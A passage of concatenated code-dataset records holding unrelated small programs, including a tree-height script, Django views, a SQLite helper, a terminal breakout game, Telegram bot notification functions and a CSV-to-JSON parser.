if(gamma_estimator==1){ # lasso\n \n# beta_hat=RMD_stable(Y,X,X.up,X.down,delta,p0,D_LB,D_add,max_iter,0,1)\n# gamma_hat<-function(x){ \n# return(b(x)%*%beta_hat)\n# }\n \n# } else if(gamma_estimator==2){ # random forest\n \n# forest<- do.call(randomForest, append(list(x=B,y=Y), arg_Forest))\n# gamma_hat<-function(x){\n# return(predict(forest,newdata=b(x), type=\"response\"))\n# }\n \n# } else if(gamma_estimator==3){ # neural net\n \n# # scale down, de-mean, run NN, scale up, remean so that NN works well\n# maxs_B <- apply(B, 2, max)\n# mins_B <- apply(B, 2, min)\n \n# maxs_Y<-max(Y)\n# mins_Y<-min(Y)\n \n# # hack to ensure that constant covariates do not become NA in the scaling\n# const=maxs_B==mins_B\n# keep=(1-const)*1:length(const)\n \n# NN_B<-B\n# NN_B[,keep]<-scale(NN_B[,keep], center = mins_B[keep], scale = maxs_B[keep] - mins_B[keep])\n \n# NN_Y<-scale(Y, center = mins_Y, scale = maxs_Y - mins_Y)\n \n# nn<- do.call(nnet, append(list(x=NN_B,y=NN_Y), arg_Nnet)) #why is it degenerate with fitted.values=1?\n# gamma_hat<-function(x){\n \n# test<-t(as.vector(x))\n# NN_b<-test\n# NN_b[,keep]<-scale(t(NN_b[,keep]), \n# center = mins_B[keep], \n# scale = maxs_B[keep] - mins_B[keep])\n \n# NN_Y_hat<-predict(nn,newdata=NN_b)\n# Y_hat=NN_Y_hat*(maxs_Y-mins_Y)+mins_Y\n \n# return(Y_hat)\n# }\n \n# }\n \n# return(list(alpha_hat,gamma_hat))\n \n# }\n","sub_path":"rr_python/stage_1.py","file_name":"stage_1.py","file_ext":"py","file_size_in_byte":9101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"238707414","text":"#Python3\n#week -1 - assign2\nimport sys, threading\nsys.setrecursionlimit(10**7) # max depth of recursion\nthreading.stack_size(2**27) # new thread will get stack of such size\ndef ComputeHeight(maxiheight,li,a,count,current):\n if len(li) == 0:\n return maxiheight,li,a,1\n if li.get(current) == None:\n return maxiheight,li,a,1\n b = li[current]\n a[current] = li[current]\n del li[current]\n for i in b:\n count = count + 1\n maxiheight = max(maxiheight,count)\n if li.get(i) !=None:\n maxiheight,li,a,count = ComputeHeight(maxiheight,li,a,count,i)\n count = count -1\n else:\n count = count -1\n return maxiheight,li,a,count\n\nn = int(input())\nnodes = list(map(int,input().split()))\nli ={}\nc =0 \nk =[]\nfor i in range(n):\n if i != n-1 and nodes[i] == nodes[i+1]:\n k.append(i)\n else:\n if nodes[i] == -1:\n c = i\n else:\n if li.get(nodes[i]) == None:\n li[nodes[i]] = k + [i]\n else:\n li[nodes[i]] = li[nodes[i]] + k + [i]\n k = []\nmaxiheight,li,a,count = ComputeHeight(1,li,{},1,c)\nprint(maxiheight)\n\n","sub_path":"C2 - Week1/tree1.py","file_name":"tree1.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"389582106","text":"from django.shortcuts import render_to_response, HttpResponse\nfrom news.models import News, Slider\nfrom projects.models import Project\nfrom anons.models import Anons\nfrom publications.models import Publications\nfrom analytics.models import Analytics\nfrom .util import to_json, get_db_data, union, get_page\n\nfrom haystack.query import SearchQuerySet\n\n\ndef index_view(request):\n news = News.objects.all()[:4]\n projects = Project.objects.all()[:3]\n slider = Slider.objects.all()[:3]\n anons = Anons.objects.all()[:3]\n analytics = Analytics.objects.all()[:5]\n publications = Publications.objects.all()[:5]\n return render_to_response('html/index.html', {\"news\": news, \"anons\": anons,\n \"projects\": projects,\n \"analytics\": union(analytics, publications, attr='pub_date', sort=True, reverse=True)[:5],\n \"slider\": slider})\n\n\ndef ajax_index_news(request, start, number):\n if request.method == 'GET':\n mimetype = 'application/json'\n news = get_db_data(start, number, News)\n return HttpResponse(to_json(news), mimetype)\n\n\ndef ajax_index_projects(request, start, number):\n if request.method == 'GET':\n mimetype = 'application/json'\n project = get_db_data(start, number, Project, carousel=True)\n return HttpResponse(to_json(project), mimetype)\n\n\ndef search(request):\n set = SearchQuerySet().filter(content=request.GET['q'])\n page = get_page(set, 3, request.GET['page'])\n return render_to_response(\"search/search.html\", {\"page\": page, \"query\": request.GET['q']})\n","sub_path":"ITDR/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"21446582","text":"import sqlite3\n\nclass BaseDeDatos:\n url_base_de_datos = 'plataforma.db'\n\n def _crear_conexion(self):\n try:\n self.conexion = sqlite3.connect(BaseDeDatos.url_base_de_datos)\n except Exception as e:\n print(e)\n\n def _cerrar_conexion(self):\n self.conexion.close()\n self.conexion = None\n\n def ejecutar_sql(self, sql):\n self._crear_conexion()\n cur = self.conexion.cursor()\n cur.execute(sql)\n\n filas = cur.fetchall()\n\n self.conexion.commit()\n self._cerrar_conexion()\n\n return filas\n\n\n","sub_path":"datos/base_de_datos.py","file_name":"base_de_datos.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"69000810","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param {ListNode} head\n # @return {ListNode}\n def swapPairs(self, head):\n old = ListNode(0)\n old.next = head\n r = old\n while head is not None:\n if head.next is not None:\n snd = head.next\n head.next = snd.next\n snd.next = head\n old.next = snd\n old = old.next.next\n head = head.next\n return r.next\n\nhead = ListNode(1)\nhead.next = ListNode(2)\nhead.next.next = ListNode(3)\nhead.next.next.next = ListNode(4)\ns = Solution()\nr = s.swapPairs(head)\nwhile r is not None:\n print(r.val)\n r = r.next","sub_path":"_24.py","file_name":"_24.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"586792031","text":"\"\"\"\ncode to run the game\n\"\"\"\n\nimport time\nimport colorama\nimport numpy as np\nimport random\nimport config\nimport util\nimport graphics\n\nfrom screen import Screen\nfrom objects import Paddle, Ball, Brick, BrickArray, ExtraBalls, UFO\nfrom boosts import Bullet, Bomb\n\nclass Game:\n \n def __init__(self):\n print(\"\\033[?25l\\033[2J\", end='')\n self.screen = Screen()\n self.paddle = Paddle(graphics.PADDLE)\n self.ball = Ball()\n # self.brickarr = self.add_bricks()\n\n self.is_over = False\n self.frame_count = 0\n self.level = 1\n\n self.ufo = UFO(self)\n\n self.__objects = {\n \"ball\": [self.ball],\n \"paddle\": [self.paddle],\n \"bricks\": [],\n \"boosts\": [],\n \"boost_multiplier\": [],\n \"boost_shrink\": [],\n \"boost_expand\": [],\n \"boost_grab\": [],\n \"boost_fast\": [],\n \"boost_thru\": [],\n \"boost_shoot\": [],\n \"extra_balls\": [],\n \"bullets\": [],\n \"bombs\": [],\n \"ufo\": [self.ufo]\n }\n\n self.__colliders = [\n (\"ball\", \"paddle\", True),\n (\"ball\", \"bricks\", True),\n (\"boosts\", \"paddle\", False),\n (\"extra_balls\", \"paddle\", True),\n (\"extra_balls\", \"bricks\", True),\n (\"bullets\", \"bricks\", False),\n (\"bombs\", \"paddle\", False),\n (\"ball\", \"ufo\", True)\n ]\n\n self.thru = False\n self.grab = False\n self.held = False\n self.reflect = False\n self.fast = False\n self.exp = False\n self.shrink = False\n self.shoot = False\n self.num = 0\n self.multiplier_on = False\n\n def clear(self):\n self.screen.clear()\n # sp.call(\"clear\", shell=True)\n print(\"\\033[0;0H\")\n\n def start(self):\n kb = util.KBHit()\n self.add_bricks()\n\n _st = time.time()\n ut = _st\n bt = _st\n\n while True:\n if self.is_over:\n break\n\n self.frame_count += 1\n time.sleep(config.DELAY)\n self.clear()\n _ct = time.time()\n\n if _ct > ut+10:\n for brick in self.__objects[\"bricks\"]:\n brick.update_position()\n if (brick.position > config.PADDLE_Y-np.array([0,2])).all():\n config.LIVES=0\n for boost in self.__objects[\"boosts\"]:\n boost.update_position()\n\n ut = _ct\n\n self.paddle.check_update()\n if self.level == 3:\n self.ufo.check_update()\n if _ct > bt + 5:\n self.__objects[\"bombs\"].append(Bomb(np.array([self.ufo.position[0] + self.ufo.width//2, self.ufo.position[1]])))\n bt = _ct\n\n thru_ball_count = 0\n for boost in self.__objects[\"boost_thru\"]:\n if boost.position[1] > config.PADDLE_Y:\n self.__objects[\"boost_thru\"].remove(boost)\n if boost.applied:\n # self.screen.draw(boost)\n if _ct > boost.boost_time:\n boost.applied = False\n thru_ball_count -= 1\n self.__objects[\"boost_thru\"].remove(boost)\n else:\n thru_ball_count += 1\n if thru_ball_count > 0:\n self.thru = True\n else:\n self.thru = False \n\n\n paddle_grab_count = 0\n for boost in self.__objects[\"boost_grab\"]:\n if boost.position[1] > config.PADDLE_Y:\n self.__objects[\"boost_grab\"].remove(boost)\n if boost.applied:\n # self.screen.draw(boost)\n if _ct > boost.boost_time:\n boost.applied = False\n paddle_grab_count -= 1\n self.__objects[\"boost_grab\"].remove(boost)\n else:\n paddle_grab_count += 1\n if paddle_grab_count > 0:\n self.grab = True\n else:\n self.grab = False \n\n\n fast_ball_count = 0\n for boost in self.__objects[\"boost_fast\"]:\n if boost.position[1] > config.PADDLE_Y:\n self.__objects[\"boost_fast\"].remove(boost)\n if boost.applied:\n # self.screen.draw(boost)\n if _ct > boost.boost_time:\n boost.applied = False\n fast_ball_count -= 1\n self.__objects[\"boost_fast\"].remove(boost)\n else:\n fast_ball_count += 1\n if fast_ball_count > 0:\n self.fast = True\n else:\n self.fast = False\n\n \n expand_paddle_count = 0\n for boost in self.__objects[\"boost_expand\"]:\n if boost.position[1] > config.PADDLE_Y:\n self.__objects[\"boost_expand\"].remove(boost)\n if boost.applied:\n # self.screen.draw(boost)\n if _ct > boost.boost_time:\n boost.applied = False\n expand_paddle_count -= 1\n self.__objects[\"boost_expand\"].remove(boost)\n else:\n expand_paddle_count += 1\n if expand_paddle_count > 0:\n self.exp = True\n else:\n self.exp = False\n\n \n shrink_paddle_count = 0\n for boost in self.__objects[\"boost_shrink\"]:\n if boost.position[1] > config.PADDLE_Y:\n self.__objects[\"boost_shrink\"].remove(boost)\n if boost.applied:\n # self.screen.draw(boost)\n if _ct > boost.boost_time:\n boost.applied = False\n shrink_paddle_count -= 1\n self.__objects[\"boost_shrink\"].remove(boost)\n else:\n shrink_paddle_count += 1\n if shrink_paddle_count > 0:\n self.shrink = True\n else:\n self.shrink = False\n\n shoot_bullet_count = 0\n for boost in self.__objects[\"boost_shoot\"]:\n if boost.position[1] > config.PADDLE_Y:\n self.__objects[\"boost_shoot\"].remove(boost)\n if boost.applied:\n if _ct > boost.boost_time:\n boost.applied = False\n shoot_bullet_count -= 1\n self.__objects[\"boost_shoot\"].remove(boost)\n else:\n shoot_bullet_count += 1\n if shoot_bullet_count > 0:\n self.shoot = True\n else:\n self.shoot = False\n\n if self.shoot and self.shrink:\n self.paddle.rep = util.str_to_array(graphics.SHOOTING_SHRUNK_PADDLE)\n self.paddle.color = util.tup_to_array(util.str_to_array(graphics.SHOOTING_SHRUNK_PADDLE).shape, (colorama.Back.YELLOW, colorama.Fore.WHITE))\n self.paddle.height, self.paddle.width = self.paddle.rep.shape\n elif self.shoot and self.exp:\n self.paddle.rep = util.str_to_array(graphics.SHOOTING_EXPANDED_PADDLE)\n self.paddle.color = util.tup_to_array(util.str_to_array(graphics.SHOOTING_EXPANDED_PADDLE).shape, (colorama.Back.YELLOW, colorama.Fore.WHITE))\n self.paddle.height, self.paddle.width = self.paddle.rep.shape\n elif self.shoot:\n self.paddle.rep = util.str_to_array(graphics.SHOOTING_PADDLE)\n self.paddle.color = util.tup_to_array(util.str_to_array(graphics.SHOOTING_PADDLE).shape, (colorama.Back.YELLOW, colorama.Fore.WHITE))\n self.paddle.height, self.paddle.width = self.paddle.rep.shape\n elif self.shrink :\n # self.paddle.change(graphics.SHRINK_PADDLE)\n self.paddle.rep = util.str_to_array(graphics.SHRUNK_PADDLE)\n self.paddle.color = util.tup_to_array(util.str_to_array(graphics.SHRUNK_PADDLE).shape, (colorama.Back.YELLOW, colorama.Fore.WHITE))\n self.paddle.height, self.paddle.width = self.paddle.rep.shape\n elif self.exp :\n # self.paddle.change(graphics.EXPAND_PADDLE)\n self.paddle.rep = util.str_to_array(graphics.EXPANDED_PADDLE)\n self.paddle.color = util.tup_to_array(util.str_to_array(graphics.EXPANDED_PADDLE).shape, (colorama.Back.YELLOW, colorama.Fore.WHITE))\n self.paddle.height, self.paddle.width = self.paddle.rep.shape\n\n if not self.exp and not self.shrink and not self.shoot:\n self.paddle.rep = util.str_to_array(graphics.PADDLE)\n self.paddle.color = util.tup_to_array(util.str_to_array(graphics.PADDLE).shape, (colorama.Back.YELLOW, colorama.Fore.WHITE))\n self.paddle.height, self.paddle.width = self.paddle.rep.shape\n\n\n ball_multiplier_count = 0\n for boost in self.__objects[\"boost_multiplier\"]:\n if boost.position[1] > config.PADDLE_Y:\n self.__objects[\"boost_multiplier\"].remove(boost)\n if boost.applied:\n # self.screen.draw(boost)\n if _ct > boost.boost_time:\n boost.applied = False\n ball_multiplier_count -= 1\n self.__objects[\"boost_multiplier\"].remove(boost)\n else:\n ball_multiplier_count += 1\n # self.split = True\n # if len(self.__objects[\"extra_balls\"]) <= 5:\n # self.manage_extra_balls()\n # self.__objects[\"extra_balls\"] += ExtraBalls(self.num).get_items()\n\n self.num = ball_multiplier_count\n # if self.num > 0:\n # self.multiplier_on = False\n # self.balls = 2 ** (ball_multiplier_count - 1)\n self.balls = 1 + len(self.__objects[\"extra_balls\"])\n self.check_balls()\n\n if kb.kbhit():\n if self.manage_keys(kb.getch()):\n print(colorama.Fore.RED + \"YOU QUIT || SCORE: \", config.SCORE)\n break\n kb.clear()\n else:\n kb.clear()\n\n self.detect_collisions() \n \n for boost in self.__objects[\"boosts\"]:\n self.screen.draw(boost)\n\n for brick in self.__objects[\"bricks\"]:\n self.screen.draw(brick)\n\n for extraball in self.__objects[\"extra_balls\"]:\n self.screen.draw(extraball)\n\n for bullet in self.__objects[\"bullets\"]:\n self.screen.draw(bullet)\n\n for bomb in self.__objects[\"bombs\"]:\n self.screen.draw(bomb)\n\n self.screen.draw(self.paddle)\n self.screen.draw(self.ball)\n if self.level == 3:\n if self.ufo.health != 0:\n self.screen.draw(self.ufo)\n else:\n self.__objects[\"ufo\"].clear()\n \n self.screen.show()\n self.show_score(_st, _ct)\n for boost in self.__objects[\"boosts\"]:\n if boost.move:\n boost.update()\n if self.reflect:\n self.ball.reflect()\n self.reflect = False\n if not self.held:\n if self.fast:\n self.ball.update(2)\n else:\n self.ball.update(1)\n\n for bullet in self.__objects[\"bullets\"]:\n bullet.update()\n\n for bomb in self.__objects[\"bombs\"]:\n bomb.update()\n\n for extraball in self.__objects[\"extra_balls\"]:\n if self.reflect:\n extraball.reflect()\n if not self.held:\n if self.fast:\n extraball.update_extraball(2)\n else:\n extraball.update_extraball(1)\n\n def manage_keys(self, ch):\n if ch == config.QUIT_CHAR:\n return True\n\n elif ch == config.RELEASE_CHAR:\n if self.held:\n self.held = False\n self.reflect = True\n\n elif ch == config.SHOOT_CHAR:\n if self.shoot:\n self.shoot_bullet(np.array([self.paddle.position[0]+self.paddle.width//2, self.paddle.position[1]]))\n\n elif ch == config.PASS_CHAR:\n self.level +=1\n config.LEVEL +=1\n self.__objects[\"bricks\"].clear()\n self.add_bricks()\n self.__objects[\"boosts\"].clear()\n\n else:\n self.paddle.move(ch)\n if self.level == 3:\n self.ufo.move(ch)\n if self.held:\n self.ball.move(ch)\n return False\n\n def add_bricks(self):\n self.__objects[\"bricks\"] += BrickArray(self).get_items()\n for brick in self.__objects[\"bricks\"]:\n if brick.has_boost:\n self.__objects[\"boosts\"].append(brick.boost)\n if (brick.boost.rep == util.str_to_array(graphics.BALL_MULTIPLIER)).all():\n self.__objects[\"boost_multiplier\"].append(brick.boost)\n elif (brick.boost.rep == util.str_to_array(graphics.SHRINK_PADDLE)).all():\n self.__objects[\"boost_shrink\"].append(brick.boost)\n elif (brick.boost.rep == util.str_to_array(graphics.EXPAND_PADDLE)).all():\n self.__objects[\"boost_expand\"].append(brick.boost)\n elif (brick.boost.rep == util.str_to_array(graphics.PADDLE_GRAB)).all():\n self.__objects[\"boost_grab\"].append(brick.boost)\n elif (brick.boost.rep == util.str_to_array(graphics.FAST_BALL)).all():\n self.__objects[\"boost_fast\"].append(brick.boost)\n elif (brick.boost.rep == util.str_to_array(graphics.THRU_BALL)).all():\n self.__objects[\"boost_thru\"].append(brick.boost)\n elif (brick.boost.rep == util.str_to_array(graphics.SHOOT_BULLETS)).all():\n self.__objects[\"boost_shoot\"].append(brick.boost)\n\n def check_balls(self):\n if self.num>1:\n if not self.multiplier_on:\n # if len(self.__objects[\"extra_balls\"]) < self.num:\n self.__objects[\"extra_balls\"] += ExtraBalls(self.balls).get_items() \n self.multiplier_on = True\n elif self.num == 1:\n if not self.multiplier_on:\n self.__objects[\"extra_balls\"] += ExtraBalls(1).get_items()\n self.multiplier_on = True\n\n def shoot_bullet(self, position):\n self.__objects[\"bullets\"].append(Bullet(position))\n\n def show_score(self, st, ct):\n if config.LIVES == 0:\n print(colorama.Back.BLACK + colorama.Style.BRIGHT + \"\\t\\tGAME OVER, YOU LOST :(\")\n self.is_over = True\n if config.BRICKS_LEFT == 0:\n # print(colorama.Back.BLACK + colorama.Style.BRIGHT + \"\\t\\tYOU WON :)\")\n self.level += 1\n if self.level == 4:\n print(colorama.Back.BLACK + colorama.Style.BRIGHT + \"\\t\\tYOU WON :)\")\n self.is_over = True\n self.start()\n # self.is_over = True\n print(colorama.Back.BLACK + colorama.Style.BRIGHT + \"=\"*config.WIDTH)\n print(colorama.Back.BLACK + colorama.Style.BRIGHT + \"\\t|| BOUNCE ||\\t\\tSCORE: \", config.SCORE, \"\\tBRICKS LEFT: \", config.BRICKS_LEFT, \"\\tTIME: \", int(ct-st), \"\\tLIVES: \", \"❤️ \"*config.LIVES, \"\\tLEVEL: \", int(self.level))\n print(colorama.Back.BLACK + colorama.Style.BRIGHT + \"=\"*config.WIDTH)\n if self.shoot:\n time_left = max(boost.boost_time for boost in self.__objects[\"boost_shoot\"]) - ct\n print(colorama.Back.BLACK + colorama.Style.BRIGHT + \"Shooting time available: \"+ str(time_left))\n\n if config.LEVEL == 3:\n print(\"UFO health: \"+ str(self.ufo.health))\n\n def detect_collisions(self):\n for pairs in self.__colliders:\n for hitter in self.__objects[pairs[0]]:\n for target in self.__objects[pairs[1]]:\n\n if pairs[0] == \"bombs\":\n if hitter.position[1] > config.PADDLE_Y:\n for bomb in self.__objects[\"bombs\"]:\n if hitter == bomb:\n self.__objects[\"bombs\"].remove(hitter)\n\n if pairs[0] == \"boosts\":\n if hitter.position[1] > config.PADDLE_Y:\n hitter.destroy()\n self.__objects[\"boosts\"].remove(hitter)\n\n if pairs[0] == \"extra_balls\":\n if hitter.position[1] > config.PADDLE_Y:\n for ball in self.__objects[\"extra_balls\"]:\n if hitter == ball:\n self.__objects[\"extra_balls\"].remove(hitter)\n \n pos_h = hitter.get_position()\n pos_t = target.get_position()\n\n height_h, width_h = hitter.get_shape()\n height_t, width_t = target.get_shape()\n\n minx = min(pos_h[0], pos_t[0])\n maxx = max(pos_h[0] + width_h, pos_t[0] + width_t)\n\n miny = min(pos_h[1], pos_t[1])\n maxy = max(pos_h[1] + height_h, pos_t[1] + height_t)\n\n if maxx - minx > width_h + width_t \\\n or maxy - miny > height_h + height_t:\n continue\n\n if pairs[0] == \"bullets\":\n self.__objects[\"bullets\"].remove(hitter)\n\n if pairs[0] == \"bombs\":\n self.__objects[\"bombs\"].remove(hitter)\n config.LIVES -+1\n config.RESET = [True, True, True]\n\n if pairs[1] == \"ufo\":\n self.ufo.health -=1\n \n if pairs[1] == \"bricks\":\n if target.strength != 4:\n config.SCORE += 30\n if target.strength == 1:\n target.destroy()\n if target.has_boost:\n target.boost.move = True\n config.BRICKS_LEFT -= 1\n self.__objects[\"bricks\"].remove(target)\n if target.is_explosive:\n for brick in self.__objects[\"bricks\"]:\n for x in range(max(5, pos_t[0] - 10), min(pos_t[0]+ 20, config.WIDTH-5)):\n # x = pos_t[0]\n for y in range(pos_t[1]-4, pos_t[1]+4):\n # y = pos_t[1]\n if (brick.position == np.array([x, y])).all():\n brick.destroy()\n config.SCORE += 30\n if brick.strength != 4:\n config.SCORE += 10\n config.BRICKS_LEFT -= 1\n\n if brick.has_boost:\n brick.boost.move = True\n self.__objects[\"bricks\"].remove(brick)\n\n else:\n target.strength -= 1\n target.implement_strength()\n\n if pairs[0] == \"boosts\":\n if hitter.active:\n hitter.applied = True\n config.SCORE += 10\n hitter.time = time.time()\n hitter.boost_time = time.time()+10\n hitter.destroy()\n self.__objects[\"boosts\"].remove(hitter)\n for boost in self.__objects[\"boost_multiplier\"]:\n if hitter == boost:\n self.multiplier_on = False \n \n if pairs[2]:\n if not self.thru:\n if pairs[1] == \"bricks\":\n if pos_h[0] == pos_t[0]+4:\n hitter.reflect()\n else:\n hitter.angle_reflect(pos_h[0] - pos_t[0] - 4)\n\n if pairs[1] == \"paddle\" or pairs[1] == \"ufo\":\n if not self.grab:\n if pos_h[0] == pos_t[0]+4:\n hitter.reflect()\n else:\n hitter.angle_reflect(pos_h[0] - pos_t[0] - 4)\n else:\n pos = pos_h\n pos[1] -= 1\n hitter.pause(pos_h)\n self.held = True\n\n","sub_path":"src/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":22245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"489734401","text":"import mysql.connector\nimport json\n\n\ndef send_message_1(query_id, name, inv, place, cause, msg): # функция для отправки уведомления о новой заявке мастеру\n import telebot\n db = mysql.connector.connect(\n host='localhost',\n user='root',\n passwd='12345',\n port='3306',\n database='ogm2'\n )\n cursor3 = db.cursor(buffered=True)\n sql = \"SELECT tg_id FROM employees WHERE (master = True)\"\n cursor3.execute(sql)\n masters_id = cursor3.fetchall()\n print(masters_id)\n\n bot_2 = telebot.TeleBot('#')\n\n keyboard = telebot.types.InlineKeyboardMarkup()\n key_choose = telebot.types.InlineKeyboardButton('Назначить ...', callback_data='choose')\n keyboard.add(key_choose)\n key_postpone = telebot.types.InlineKeyboardButton('Отложить', callback_data='postpone')\n keyboard.add(key_postpone)\n\n\n #392674056\n for i in masters_id:\n try:\n bot_2.send_message(i[0], \"*НОВАЯ ЗАЯВКА*\" + \"\\n\" + \"*id_заявки: *\" + str(\n query_id) + \"\\n\" + \"*Наименование: *\" + name + \"\\n\" +\n \"*Инв.№: *\" + inv + \"\\n\" + \"*Участок: *\" + place + \"\\n\" + \"*Причина поломки: *\" +\n cause + \"\\n\" + \"*Сообщение: *\" + msg, reply_markup=keyboard, parse_mode=\"Markdown\")\n except:\n pass\n\n\ndef send_message_2(id_employee, query_id): # функция для отправки уведомления сотруднику\n import telebot\n bot_3 = telebot.TeleBot('#')\n db = mysql.connector.connect(\n host='localhost',\n user='root',\n passwd='12345',\n port='3306',\n database='ogm2'\n )\n cursor3 = db.cursor(buffered=True)\n sql = \"SELECT equipment.eq_name, equipment.invnum, equipment.eq_type, equipment.area, \" \\\n \"queries.reason, queries.msg FROM \" \\\n \"equipment JOIN queries ON ((queries.query_id = %s) AND (queries.eq_id = equipment.eq_id)) \"\n val = (query_id,)\n cursor3.execute(sql, val)\n msg = cursor3.fetchone()\n print(msg)\n\n keyboard = telebot.types.InlineKeyboardMarkup()\n key_start_now = telebot.types.InlineKeyboardButton('Начинаю выполнение', callback_data='start_now')\n keyboard.add(key_start_now)\n key_start_later = telebot.types.InlineKeyboardButton('Отложить', callback_data='start_later')\n keyboard.add(key_start_later)\n\n bot_3.send_message(id_employee, \"У вас новая заявка\" + \"\\n\" + \"*id_заявки: *\" + str(query_id) + \"\\n\" +\n \"*Оборудование: *\" + msg[0] + \"\\n\" + \"*Инв.№: *\" + msg[1] + \"\\n\" +\n \"*Тип станка: *\" + msg[2] + \"\\n\" + \"*Участок: *\" + msg[3] + \"\\n\" +\n \"*Причина поломки: *\" + msg[4] + \"\\n\" + \"*Сообщение: *\" + str(msg[5]), reply_markup=keyboard,\n parse_mode=\"Markdown\")\n\n cursor3.close()\n\n\ndef send_message_3(query_id):\n import telebot\n bot_3 = telebot.TeleBot('#')\n db = mysql.connector.connect(\n host='localhost',\n user='root',\n passwd='12345',\n port='3306',\n database='ogm2'\n )\n cursor3 = db.cursor(buffered=True)\n sql = \"SELECT equipment.eq_name, equipment.invnum, equipment.eq_type, equipment.area, \" \\\n \"queries.reason, queries.msg FROM \" \\\n \"equipment JOIN queries ON ((queries.query_id = %s) AND (queries.eq_id = equipment.eq_id)) \"\n val = (query_id,)\n cursor3.execute(sql, val)\n msg = cursor3.fetchone()\n\n bot_3.send_message(392674056, \"*id_заявки: *\" + str(query_id) + \"\\n\" +\n \"*Оборудование: *\" + msg[0] + \"\\n\" + \"*Инв.№: *\" + msg[1] + \"\\n\" +\n \"*Тип станка: *\" + msg[2] + \"\\n\" + \"*Участок: *\" + msg[3] + \"\\n\" +\n \"*Причина поломки: *\" + msg[4] + \"\\n\" + \"*Сообщение: *\" + str(msg[5]), parse_mode=\"Markdown\")\n cursor3.close()\n\n\n\n","sub_path":"Send_message.py","file_name":"Send_message.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"351539976","text":"from django.db import models\n\nfrom cms.models import CMSPlugin\nfrom filer.fields.image import FilerImageField\n\n\nclass Slider(CMSPlugin):\n title = models.CharField(max_length=50,\n blank=True,\n null=True,\n help_text=\"Title is optional and will be displayed\"\n \" above the slideshow.\"\n )\n\n\nclass Slide(CMSPlugin):\n image = FilerImageField()\n caption = models.CharField(max_length=55,\n blank=True,\n null=True,\n help_text=\"Caption is optional and will be\"\n \" displayed below the slide.\"\n )\n","sub_path":"my_site/slideshow/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"229418134","text":"def fn():\r\n n = int(input().strip())\r\n a = list(map(int,input().strip().split()))\r\n s = [0]\r\n area = 0\r\n maxi = 0\r\n\r\n for i in range(1,n):\r\n if(a[s[-1]] <= a[i]):\r\n s.append(i)\r\n else:\r\n while(len(s)!=0 and a[s[-1]] > a[i]):\r\n index = s.pop()\r\n if(len(s)!=0):\r\n area = (i-s[-1]-1)*a[index]\r\n else:\r\n area = i*a[index]\r\n\r\n maxi = max(maxi,area)\r\n s.append(i)\r\n \r\n i = n\r\n\r\n while(len(s)!=0):\r\n index = s.pop()\r\n if(len(s)==0):\r\n maxi = max(maxi,a[index]*n)\r\n else:\r\n maxi = max(maxi,(i-s[-1]-1)*a[index])\r\n\r\n print(maxi)\r\n\r\nfor _ in range(int(input().strip())):\r\n fn()","sub_path":"python/Maximum_Rectangular_Area_in_a_Histogram.py","file_name":"Maximum_Rectangular_Area_in_a_Histogram.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"285453106","text":"__author__ = 'mohanrandhava'\n\nimport csv\nimport json\nimport os.path\n\n\"\"\"\nParseCSV converts the data in 'csv_file' and converts each record\ninto a json object and places all results into 'json_file'.\n\"\"\"\n\nclass ParseCSV(object):\n\n def __init__(self, csv_file, json_file):\n self.json_file = json_file\n self.csv_file = csv_file\n\n def read_data(self):\n basepath = os.path.dirname(__file__)\n filepath = os.path.abspath(os.path.join(basepath, \"../..\", \"data\", self.csv_file))\n with open(filepath, 'r') as f:\n parsed_data = [row for row in csv.reader(f.read().splitlines())]\n return parsed_data\n\n def read_csv_as_json(self):\n basepath = os.path.dirname(__file__)\n filepath = os.path.abspath(os.path.join(basepath, \"../..\", \"data\", self.csv_file))\n f = open(filepath, 'r')\n headers = f.readline().strip().split(',')\n reader = csv.DictReader(f, headers)\n parsed_data = []\n counter = 1\n for row in reader:\n row['filmid'] = counter\n counter += 1\n parsed_data.append(row)\n return parsed_data\n\n def convert_csv_to_json(self):\n basepath = os.path.dirname(__file__)\n filepath = os.path.abspath(os.path.join(basepath, \"../..\", \"data\", self.json_file))\n jsonfile = open(filepath, 'w')\n for row in self.read_csv_as_json():\n json.dump(row, jsonfile)\n jsonfile.write('\\n')\n\np = ParseCSV(\"film_locations_in_san_francisco.csv\",\"film_locations_in_san_francisco.json\")\np.read_csv_as_json()","sub_path":"app/migration/parsing/ParseCSV.py","file_name":"ParseCSV.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"391711255","text":"import numpy as np\nfrom scipy.optimize import fmin_powell, minimize, basinhopping, shgo, dual_annealing\nfrom scipy.stats import pearsonr\nfrom copy import deepcopy\nfrom joblib import Parallel, delayed\n\n\ndef error_function(\n parameters,\n args,\n data,\n objective_function):\n \"\"\"\n Parameters\n ----------\n parameters : list or ndarray\n A tuple of values representing a model setting.\n args : dictionary\n Extra arguments to `objective_function` beyond those in `parameters`.\n data : ndarray\n The actual, measured time-series against which the model is fit.\n objective_function : callable\n The objective function that takes `parameters` and `args` and\n produces a model time-series.\n\n Returns\n -------\n error : float\n The residual sum of squared errors between the prediction and data.\n \"\"\"\n return np.nan_to_num(np.sum((data - objective_function(*list(parameters), **args))**2), nan=1)\n #return 1-np.nan_to_num(pearsonr(data,np.nan_to_num(objective_function(*list(parameters), 